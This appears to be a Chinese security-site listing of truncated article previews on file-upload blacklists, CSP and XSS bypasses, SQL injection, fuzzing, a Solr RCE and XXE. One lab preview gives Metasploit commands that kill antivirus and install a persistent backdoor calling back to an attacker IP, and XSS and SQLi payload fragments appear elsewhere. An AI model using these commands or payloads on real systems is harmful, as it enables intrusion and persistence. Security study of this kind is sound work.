Author:平安银行应用安全团队-Glassy引言JFinal是国产优秀的web框架，短小精悍强大,易于使用。近期团队内一名小伙伴（LuoKe）在安全测试的时候报了一个很玄学的任意文件上传，笔者本着知其然必知其所以然的态度去跟进了一下问题代码，发现问题系统在处理上传文件功能的时候使用了JFinal框架，于是去对该框架上传文件处的代码做了一下审计，发现了JFinal上传文件的黑名单机制

前言内容安全策略(Content Security Policy，CSP)是一种内置的浏览器技术，有助于防止跨站点脚本(XSS)等攻击。它列出并描述了路径和源，浏览器可以从这些路径和源安全地加载资源,这些资源可能包括图像、框架、JavaScricript等。但是，如果当所有不安全的资源来源都不被允许时，我们仍可以给出一个成功的XSS事件的例子呢？是怎么做到的呢？ 当一切正常时，CSP是如

前几天看了浏览器解码看XSS，没有看得很明白，又找了这篇深入理解浏览器解析机制和XSS向量编码，翻译的文章，有些地方翻译的怪怪的，需要看下原文，啃了2天终于搞明白了原文里给出了几个XSS Payload，也给出了答案和演示地址，有答案但没解析，下面一个个分析有点像上学的时候，看书看不懂，做题不会做，看答案解析做题就懂了Basics1<a href="%6a%61%76%6

序言现代化的web服务对比传统的web服务，增加了许多新的功能和特性，在这种情况下，数据库所存储的内容、与数据库交互的代码也发生了改变，同时也增加了许多攻击面。本文将结合实际情况，谈谈现代化web服务可能暴露的一些SQLi攻击面和利用手段。关于传统SQLi攻击面传统注入中，SQLi只用来做几件事：读web账号密码SELECT ... FROM admin、伪造账号密码'or'=&#

这是内核漏洞挖掘技术系列的第十三篇(本篇文章为翻译)。第一篇：内核漏洞挖掘技术系列(1)——trinity第二篇：内核漏洞挖掘技术系列(2)——bochspwn第三篇：内核漏洞挖掘技术系列(3)——bochspwn-reloaded(1)第四篇：内核漏洞挖掘技术系列(3)——bochspwn-reloaded(2)第五篇：内核漏洞挖掘技术系列(4)——syzkaller(1)第六篇：内核漏洞挖掘技

攻击机：192.168.85.130目标机win7：192.168.85.131Persistence后门使用此方法建议运行前关闭杀毒软件Run post/windows/manage/killav输入run persistence -S -U -X -i 5 -p 6666 -r 192.168.85.130创建一个持久性的后门。参数解释如下：-A 自动启动一个匹配的漏洞/多/处理程序

前言American Fuzzy Lop（AFL）很棒。在命令行应用程序上快速进行的模糊测试分析是最好的选择。但是，如果通过命令行访问你想要模糊的东西的情况怎么样呢？很多时候你可以编写一个测试工具（或者可能使用 libFuzzer），但如果你想要模拟你想要模糊的代码部分，并得到 AFL 的所有基于 coverage 的优点呢？例如，你可能想要从嵌入式系统中模糊解析函数，该系统通过 RF 接收输

概述近日，Apache Solr官方发布Apache Solr存在一个远程代码执行漏洞（CVE-2019-0193），攻击者可利用dataConfig参数构造恶意请求，导致执行任意代码，下面简单分析一下这个漏洞。官方通告：https://issues.apache.org/jira/browse/SOLR-13669前置概念DataimportSolr支持从Dataimport导入自定义数据，da

Hello hackers,几个星期前，我发布推文称挖到了一个XML实体注入漏洞。这个漏洞的挖掘非常艰难，目标应用程序的WAF封锁了所有对外的请求，包括DNS查询。所以在这里，我向你分享这个有趣的挖洞故事。由于这是一个私人项目，不便透露站点信息，请见谅。和往常一样，我在夜里开始黑客工作。在目标站点上收集信息时，我碰到了一个参数为xml的端点，参数内容做了加密处理。进一步分析，我发现这个发往后端的X

前言继续对SQL注入进行一个总结以及学习，本文目录如下：SQL约束攻击order by后的注入insert、update、delete后的注入http分割注入desc相关问题万能密码\N问题唔，新姿势不多，望各位师傅莫怪SQL约束攻击SQL约束攻击并不是一种很新颖的攻击方式，它的成因是因为在处理SQL中的字符串时，字符串末尾的空格字符都会被删除。换句话说，“lengyi”与“lengyi ”几